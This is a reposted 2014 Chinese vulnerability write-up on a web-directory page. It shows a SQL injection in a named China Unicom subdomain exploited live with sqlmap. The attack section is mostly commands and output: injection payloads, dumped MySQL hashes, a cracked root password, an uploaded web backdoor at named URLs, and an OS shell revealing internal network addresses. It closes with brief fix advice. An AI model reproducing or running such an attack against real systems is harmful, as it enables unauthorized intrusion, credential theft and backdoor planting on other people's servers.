网站目录收录网站方式:1.人工手动审核。2.自助审核(你的网站在权重3、PR4以上,挂上本站友链->点击友链->自动审核通过。)
北京 天津 上海 广东 深圳 河北 河南 新疆 重庆 四川 贵州 湖南 湖北 云南 广西 宁夏 青海 甘肃 陕西
西藏 海南 山东 福建 安徽 浙江 吉林 山西 江西 江苏 辽宁 黑龙 内蒙 澳门 香港 台湾 日本 韩国 美国
当前位置:站长啦网站目录 » 新闻资讯 » 站长新闻 » 漏洞预警 » 文章详细 订阅RssFeed

联通某分站MySQL注入ROOT权限下载

来源:黑吧安全网 浏览:1442次 时间:2014-04-28
简介:联通某分站MySQL注入ROOT权限PHP + MYSQL注入,ROOT权限,可获得SHELL,接下来能做啥大家都知道了。在黑吧安全网看到这个漏洞 17WO手机验证码绕过可任意修改其他用户密码 于是测试一下。漏洞依然存在,未修复。接着检查一

联通某分站MySQL注入ROOT权限

PHP + MYSQL注入,ROOT权限,可获得SHELL,接下来能做啥大家都知道了。

在黑吧安全网看到这个漏洞 17WO手机验证码绕过可任意修改其他用户密码 于是测试一下。漏洞依然存在,未修复。接着检查一下其他子域名的安全。



百度搜索“site:17wo.cn”一下,得到可能的注入点:http://card.17wo.cn/wap/wap_card.php?id=2548



扔给sqlmap跑一下:

 

./sqlmap.py --random-agent --batch --thread 10 -u 'card.17wo.cn/wap/wap_card.php?id=2548' --password

sqlmap/1.0-dev-ab36e5a - automatic SQL injection and database takeover tool
http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 14:24:01

[14:24:01] [INFO] fetched random HTTP User-Agent header from file '/sqlmap/txt/user-agents.txt': Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.2 Safari/530.5
[14:24:01] [INFO] resuming back-end DBMS 'mysql'
[14:24:01] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=2548 AND 1953=1953

Type: UNION query
Title: MySQL UNION query (NULL) - 1 column
Payload: id=2548 UNION ALL SELECT CONCAT(0x716c647471,0x796b6866457170574455,0x7165736271)#

Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=2548 AND SLEEP(5)
---
[14:24:02] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.4.4, PHP 5.5.3
back-end DBMS: MySQL 5.0.11
[14:24:02] [INFO] fetching database users password hashes
[14:24:02] [WARNING] reflective value(s) found and filtering out
[14:24:02] [INFO] the SQL query used returns 6 entries
[14:24:02] [INFO] starting 6 threads
[14:24:02] [INFO] retrieved: "root","*B80A3FB57E2E58C89333D9AEA9A624B1CB8C4520"
[14:24:03] [INFO] retrieved: "",""
[14:24:03] [INFO] retrieved: "pma",""
[14:24:03] [INFO] retrieved: "",""
[14:24:03] [INFO] retrieved: "root","*B80A3FB57E2E58C89333D9AEA9A624B1CB8C4520"
[14:24:03] [INFO] retrieved: "root",""
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] N
do you want to perform a dictionary-based attack against retrieved password hashes? [Y/n/q] Y
[14:24:03] [INFO] using hash method 'mysql_passwd'
what dictionary do you want to use?
[1] default dictionary file '/sqlmap/txt/wordlist.zip' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
> 1
[14:24:03] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N] N
[14:24:03] [INFO] starting dictionary-based cracking (mysql_passwd)
[14:24:03] [INFO] starting 4 processes
[14:24:33] [INFO] cracked password 'wise' for user 'root'
database management system users password hashes:
[*] pma [1]:
password hash: NULL
[*] root [2]:
password hash: *B80A3FB57E2E58C89333D9AEA9A624B1CB8C4520
clear-text password: wise
password hash: NULL





直接跑出root密码。



执行个命令试试:

 

[14:26:46] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.4.4, PHP 5.5.3
back-end DBMS: MySQL 5.0.11
[14:26:46] [INFO] going to use a web backdoor for command prompt
[14:26:46] [INFO] fingerprinting the back-end DBMS operating system
[14:26:46] [WARNING] reflective value(s) found and filtering out
[14:26:46] [INFO] the back-end DBMS operating system is Windows
which web application language does the web server support?
[1] ASP
[2] ASPX
[3] JSP
[4] PHP (default)
> 4
[14:26:46] [INFO] retrieved the web server document root: 'D:\xampp\htdocs\pailife'
[14:26:46] [INFO] retrieved web server absolute paths: 'D:/xampp/htdocs/pailife/wap/wap_card.php'
[14:26:46] [INFO] trying to upload the file stager on '/' via LIMIT INTO OUTFILE technique
[14:26:47] [WARNING] unable to upload the file stager on '/'
[14:26:47] [INFO] trying to upload the file stager on '/' via UNION technique
[14:26:48] [WARNING] expect junk characters inside the file as a leftover from UNION query
[14:26:48] [INFO] the remote file /tmpujmue.php is larger than the local file /var/folders/9g/xlxjdbd909d7z4lxrr51tj1m0000gn/T/tmpsx2Rm4
[14:26:50] [INFO] trying to upload the file stager on '/wap' via LIMIT INTO OUTFILE technique
[14:26:53] [WARNING] unable to upload the file stager on '/wap'
[14:26:53] [INFO] trying to upload the file stager on '/wap' via UNION technique
[14:26:59] [WARNING] it looks like the file has not been written, this can occur if the DBMS process' user has no write privileges in the destination path
[14:27:00] [INFO] trying to upload the file stager on '/xampp/htdocs/pailife/wap' via LIMIT INTO OUTFILE technique
[14:27:03] [INFO] heuristics detected web page charset 'utf-8'
[14:27:03] [INFO] the file stager has been successfully uploaded on '/xampp/htdocs/pailife/wap' - http://card.17wo.cn:80/wap/tmpujmue.php
[14:27:06] [INFO] heuristics detected web page charset 'ascii'
[14:27:06] [INFO] the backdoor has been successfully uploaded on '/xampp/htdocs/pailife/wap' - http://card.17wo.cn:80/wap/tmpboyhw.php
[14:27:06] [INFO] calling OS shell. To quit type 'x' or 'q' and press ENTER
os-shell> ipconfig
do you want to retrieve the command standard output? [Y/n/a] Y
[14:27:17] [INFO] heuristics detected web page charset 'GB2312'
command standard output:
---

Windows IP 配置


以太网适配器 本地连接:

连接特定的 DNS 后缀 . . . . . . . :
本地链接 IPv6 地址. . . . . . . . : fe80::3cf0:d229:52:6821
IPv4 地址 . . . . . . . . . . . . : 10.123.176.75
子网掩码 . . . . . . . . . . . . : 255.255.255.224
默认网关. . . . . . . . . . . . . : 10.123.176.67

隧道适配器 本地连接* 4:

连接特定的 DNS 后缀 . . . . . . . :
IPv6 地址 . . . . . . . . . . . . : 2001:0:9d38:6ab8:b0:7d8:f584:4fb4
本地链接 IPv6 地址. . . . . . . . : fe80::b0:7d8:f584:4fb4
默认网关. . . . . . . . . . . . . : ::

隧道适配器 isatap.{DD9307C7-D162-4559-AFA6-28E9AA162058}:

媒体状态 . . . . . . . . . . . . : 媒体已断开
连接特定的 DNS 后缀 . . . . . . . :
---





完全没问题。



接下来就啥都能做了...



发漏洞之前在黑吧安全网搜了一下,发现去年就有人提相关漏洞。直到现在大半年都没修复。此漏洞权当再次给当事人提个醒吧。

修复方案:

其一提高安全意识(那么久的漏洞都不修),其次防注入,降低权限...


0

版权与免责声明:

凡注明稿件来源的内容均为转载稿或由网友用户注册发布,本网转载出于传递更多信息的目的;如转载稿涉及版权问题,请作者联系我们,同时对于用户评论等信息,本网并不意味着赞同其观点或证实其内容的真实性;


本文地址:https://top.cnzzla.com/artinfo/672.html

好玩的手游下载

猜你喜欢

推荐站点

  • 福州小程序开发福州小程序开发

    福州好小蚁科技提供专业的微信小程序开发、软件定制、手机APP开发、网站开发等高端定制外包服务,价格美丽,服务周到.一对一项目对接,不满意退全款!预约电话:13107632710 胡小春!福州好小蚁科技有限公司是福建福州网站app等技术开发优秀网络公司。

    www.fzant.com
  • 世界时间网世界时间网

    世界时间网为您提供世界各地精准时间,北京时间校准器,标准时间,世界各地时间与北京时间对比,时间换算等,希望对您有所帮助。

    top.cnzzla.com/time
  • 科技镇科技镇

    科技镇 | 关注科技、娱乐、人文、生活!

    www.kejizhen.com
  • 心动网址导航心动网址导航

    心动网址导航精选了国内国外著名的网站、好玩的、好看的、有趣的国内国外网站以及实用的、优秀的国内国外网站,包括国外视频、国外购物、国外交友、国外新闻等多种类型 同时提供精品行业分类目录提交,让用户全方位了解国内国外互联网动态!

    xd00.com
  • 门户网址-优秀网站导航门户网址-优秀网站导航

    门户网址-优秀网站导航,精选网址导航,免费分类目录提交,实用酷站大全。

    top.mhwz.cn

最新优秀网站